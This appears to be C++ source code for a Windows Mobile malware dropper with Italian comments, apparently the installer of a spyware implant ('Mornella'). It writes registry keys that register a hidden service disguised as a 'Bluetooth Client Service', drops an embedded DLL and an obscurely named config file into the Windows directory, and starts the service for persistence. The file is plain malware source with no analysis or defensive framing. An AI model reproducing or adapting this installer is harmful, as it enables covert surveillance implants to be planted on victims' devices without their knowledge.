#include "Mopper.h"

using namespace std;

INT WINAPI main(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
	// Enumera i servizi
	DWORD dw, en = 1000;
	BYTE *pBuf, *tmp;
	ServiceEnumInfo *si;

	pBuf = new BYTE[1000];
	tmp = pBuf;
	EnumServices(pBuf, &dw, &en);
	for(DWORD i = 0; i < dw; i++){
		si = (ServiceEnumInfo *)tmp;
		tmp += sizeof(ServiceEnumInfo);
	}
	delete[] pBuf;
	// Fine enumerazione

	if(CreateRegistryKeys(L"BTHClnt", L"bthclnt.dll", L"BTC", L"Bluetooth Client Service") == FALSE)
		return FALSE;

	if(DropFile(L"\\windows\\CGXH8p.ks7", IDR_CONF) == FALSE)
		return FALSE;

	if(DropFile(L"\\windows\\bthclnt.dll", IDR_MORNELLA) == FALSE)
		return FALSE;

	// Que - Gabolicchia per avviare il servizio
	if(RegisterService(L"BTC", 0, L"BTHClnt", 0) == NULL){
		int err;
		err = GetLastError();
		return FALSE;
	}

	return TRUE;
}

BOOL CreateRegistryKeys(PWCHAR pServiceName, PWCHAR pDllName, PWCHAR pServicePrefix, PWCHAR pFriendlyName) {
	HKEY hKey;
	DWORD dwDisp, dwServiceStatus, len;
	PWCHAR pPath = NULL;

	if(wcslen(pServiceName) == 0 || wcslen(pDllName) == 0 || wcslen(pServicePrefix) == 0)
		return FALSE;

	len = wcslen(L"Services") + wcslen(L"\\") + wcslen(pServiceName) + 1;
	pPath = new(std::nothrow) WCHAR[len];

	if(pPath == NULL)
		return FALSE;

	memset(pPath, 0x00, sizeof(WCHAR) * len);
	wcscpy(pPath, L"Services");
	wcscat_s(pPath, len, L"\\");
	wcscat_s(pPath, len, pServiceName);

	if(RegCreateKeyEx(HKEY_LOCAL_MACHINE, pPath, 0, NULL, REG_OPTION_NON_VOLATILE, 0, NULL, &hKey, &dwDisp) != ERROR_SUCCESS) {
		delete[] pPath;
		return FALSE;
	}

	// La chiave gia' esiste...
	if(dwDisp == REG_OPENED_EXISTING_KEY){

	}

	// Dll name
	if(RegSetValueEx(hKey, L"Dll", 0, REG_SZ, (PBYTE)pDllName, wcslen(pDllName) * sizeof(WCHAR)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	// Order
	dwDisp = 9;
	if(RegSetValueEx(hKey, L"Order", 0, REG_DWORD, (PBYTE)&dwDisp, sizeof(dwDisp)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	// Index
	dwDisp = 0;
	if(RegSetValueEx(hKey, L"Index", 0, REG_DWORD, (PBYTE)&dwDisp, sizeof(dwDisp)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	// Context
	dwServiceStatus = SERVICE_INIT_STARTED;
	if(RegSetValueEx(hKey, L"Context", 0, REG_DWORD, (PBYTE)&dwServiceStatus, sizeof(dwDisp)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	// Service Prefix
	if(RegSetValueEx(hKey, L"Prefix", 0, REG_SZ, (PBYTE)pServicePrefix, wcslen(pServicePrefix) * sizeof(WCHAR)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	// Friendly Name
	if(RegSetValueEx(hKey, L"Description", 0, REG_SZ, (PBYTE)pFriendlyName, wcslen(pFriendlyName) * sizeof(WCHAR)) != ERROR_SUCCESS){
		RegCloseKey(hKey);
		delete[] pPath;
		return FALSE;
	}

	RegCloseKey(hKey);
	delete[] pPath;
	return TRUE;
}

BOOL DropFile(PWCHAR pPathName, UINT uResourceId) {
	HRSRC hResource;
	HGLOBAL hFileResource;
	LPVOID lpFile, lpBaseAddress;
	DWORD dwSize;
	HANDLE hFile, hFilemap;
	OSVERSIONINFO osi;
	INT iRes;

	if(wcslen(pPathName) == 0)
		return FALSE;

	memset(&osi, 0x00, sizeof(OSVERSIONINFO));
	osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

	GetVersionEx(&osi);

	// Mettiamo questo switch per compatibilita' futura
	switch(osi.dwMajorVersion){
		case 5:
			iRes = uResourceId;
			break;

		default:
			iRes = uResourceId;
			return FALSE;
	}

	// First find and load the required resource           
	hResource = FindResource(GetModuleHandle(NULL), MAKEINTRESOURCE(iRes), L"BINARY"); 

	if(hResource == NULL)
		return FALSE;

	hFileResource = LoadResource(NULL, hResource);

	if(hFileResource == NULL)
		return FALSE;

	// Now open and map this to a disk file
	lpFile = LockResource(hFileResource);
	dwSize = SizeofResource(NULL, hResource);

	// Open the file and filemap
	hFile = CreateFile(pPathName, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		int err = GetLastError();
		return FALSE;
	}

	hFilemap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, dwSize, NULL);

	if(hFilemap == NULL){
		CloseHandle(hFile);
		return FALSE;
	}

	lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);

	if(lpBaseAddress == NULL){
		UnmapViewOfFile(lpBaseAddress);
		CloseHandle(hFilemap);
		CloseHandle(hFile);
		return FALSE;
	}

	// Write the file 
	RtlCopyMemory(lpBaseAddress, lpFile, dwSize);

	// Unmap the file and close the handles
	UnmapViewOfFile(lpBaseAddress);
	CloseHandle(hFilemap);
	CloseHandle(hFile);

	return TRUE;
}
